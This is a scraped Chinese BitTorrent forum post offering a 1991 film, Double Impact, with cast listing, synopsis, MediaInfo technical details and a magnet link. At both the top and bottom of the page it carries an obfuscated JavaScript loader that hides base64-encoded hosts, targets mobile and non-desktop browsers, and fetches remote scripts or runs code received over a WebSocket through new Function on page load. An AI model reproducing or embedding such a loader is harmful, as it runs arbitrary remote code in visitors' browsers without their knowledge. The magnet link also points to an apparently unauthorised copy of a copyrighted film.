绝地双尊[中文字幕].Double.Impact.1991.1080p.BluRay.DD2.0.x265-10bit 7.98GB

版主小s 27天前 234

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 绝地双尊 / 叠影威龙

◎片 名 Double Impact

◎年 代 1991

◎产 地 美国

◎类 别 剧情 / 动作 / 犯罪

◎语 言 英语

◎上映日期 1991-07-31

◎IMDb链接 https://www.imdb.com/title/tt0101764/

◎豆瓣评分 6.1/10 (961人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304483/

◎片 长 110 分钟

◎导 演 谢尔登 莱提奇 Sheldon Lettich (id:1014453)

◎编 剧 尚格·云顿 Jean-Claude Van Damme (id:1027149)

彼得·克里克斯 Peter Krikes (id:1289026)

谢尔登 莱提奇 Sheldon Lettich (id:1014453)

Steve Meerson Steve Meerson (id:1291768)

◎演 员 艾丽西娅·史蒂文森 Alicia Stevenson (id:1298424)

阿隆娜·肖 Alonna Shaw (id:1344743)

张午郎 John Cheung (id:1348971)

谢莉·米歇尔 Shelley Michelle (id:1000503)

岑建勋 John Sham (id:1274474)

Jack Gilardi Jr. Jack Gilardi Jr. (id:1005428)

陈欣健 Philip Chan (id:1007245)

杨斯 Bolo Yeung (id:1010633)

尚格·云顿 Jean-Claude Van Damme (id:1027149)

陈星 Sing Chen (id:1033057)

杰佛里·刘易斯 Geoffrey Lewis (id:1054474)

朱莉·斯特兰 Julie Strain (id:1054957)

安迪·阿姆斯特朗 Andy Armstrong (id:1058794)

Corinna Everson Corinna Everson (id:1081701)

阿兰·斯卡费 Alan Scarfe (id:1139398)

萨拉-简·瓦利 Sarah-Jane Varley (id:1319015)

迈克尔·道格拉斯 Michael Douglas (id:1053620)

Terry Carr Terry Carr (id:1034087)

尚格·云顿 Jean-Claude Van Damme (id:1027149)

里克·比伯 Rick Bieber (id:1278599)

谢尔登 莱提奇 Sheldon Lettich (id:1014453)

保罗·迈克尔·格拉泽 Paul Michael Glaser (id:1002785)

Arthur Kempel Arthur Kempel (id:1026228)

理查·克莱因 Richard H. Kline (id:1042362)

Mark Conte Mark Conte (id:1281171)

Suzette Sheets Suzette Sheets (id:1297393)

Joseph A. Porro Joseph A. Porro (id:1294749)

Janice Alexander Janice Alexander (id:1276985)

佐尔坦·埃雷克 Zoltan Elek (id:1283102)

Karen Asano-Myers Karen Asano-Myers (id:1277472)

Katalin Elek Katalin Elek (id:1283086)

安迪·阿姆斯特朗 Andy Armstrong (id:1058794)

维克·阿姆斯特朗 Vic Armstrong (id:1027958)

张午郎 John Cheung (id:1348971)

◎标 签 动作 / 美国 / 1991 / 犯罪 / 尚格·云顿 / 尚格云顿 / 美国电影 / 黑帮

◎简 介

艾利克斯(尚格·云顿 Jean-Claude Van Damme 饰)和查德(尚格·云顿 Jean-Claude Van Damme 饰)是情同手足的孪生兄弟,然而,童年时代的一场意外不仅让他们永远地失去了父母,还令手足失散分散两地,查德跟随老管家来到了巴黎,而艾利克斯流落香港变成了一个古惑仔。

多年过去,查德看到了艾利克斯的照片,终于发现了他的踪迹。激动的查德千里迢迢赶往香港,想要和兄弟重聚。然而,令查德感到震惊的是,他发现当年杀害自己父母的凶手,竟然正是艾利克斯的死敌。可是,对于兄弟重聚,艾利克斯却并不像查德那样充满了喜悦,正相反,面对这个处处都比自己优秀的多的男人,他感到了深深的危机。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 267359921929493827329985976848390203558 (0xC923A5E087A85C65389192EBC072A8A6)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.98 GiB

  8. Duration : 1 h 49 min

  9. Overall bit rate : 10.4 Mb/s

  10. Movie name : Double Impact 1991 1080p BluRay DD2.0 [email protected]

  11. Encoded date : UTC 2021-11-03 23:14:18

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 49 min

  21. Bit rate : 9 756 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 040 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.204

  31. Stream size : 7.48 GiB (94%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 1 h 49 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 2 channels

  46. Channel layout : L R

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 502 MiB (6%)

  51. Title : English

  52. Language : English

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 42 min

  63. Bit rate : 12.8 kb/s

  64. Count of elements : 1324

  65. Stream size : 9.38 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 42 min

  77. Bit rate : 13.3 kb/s

  78. Count of elements : 1324

  79. Stream size : 9.73 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Menu

  85. 00:00:00.000 : en:Chapter 01

  86. 00:03:24.037 : en:Chapter 02

  87. 00:09:45.919 : en:Chapter 03

  88. 00:13:08.621 : en:Chapter 04

  89. 00:21:01.510 : en:Chapter 05

  90. 00:29:05.118 : en:Chapter 06

  91. 00:37:34.627 : en:Chapter 07

  92. 00:42:22.040 : en:Chapter 08

  93. 00:50:05.711 : en:Chapter 09

  94. 00:58:56.033 : en:Chapter 10

  95. 01:07:33.550 : en:Chapter 11

  96. 01:17:59.175 : en:Chapter 12

  97. 01:23:51.443 : en:Chapter 13

  98. 01:28:49.533 : en:Chapter 14

  99. 01:34:15.859 : en:Chapter 15

  100. 01:44:15.249 : en:Chapter 16




复制代码


TAGS 动作 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:432F2A3CB988732AA06A0A3BBEE41662300B7A80

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};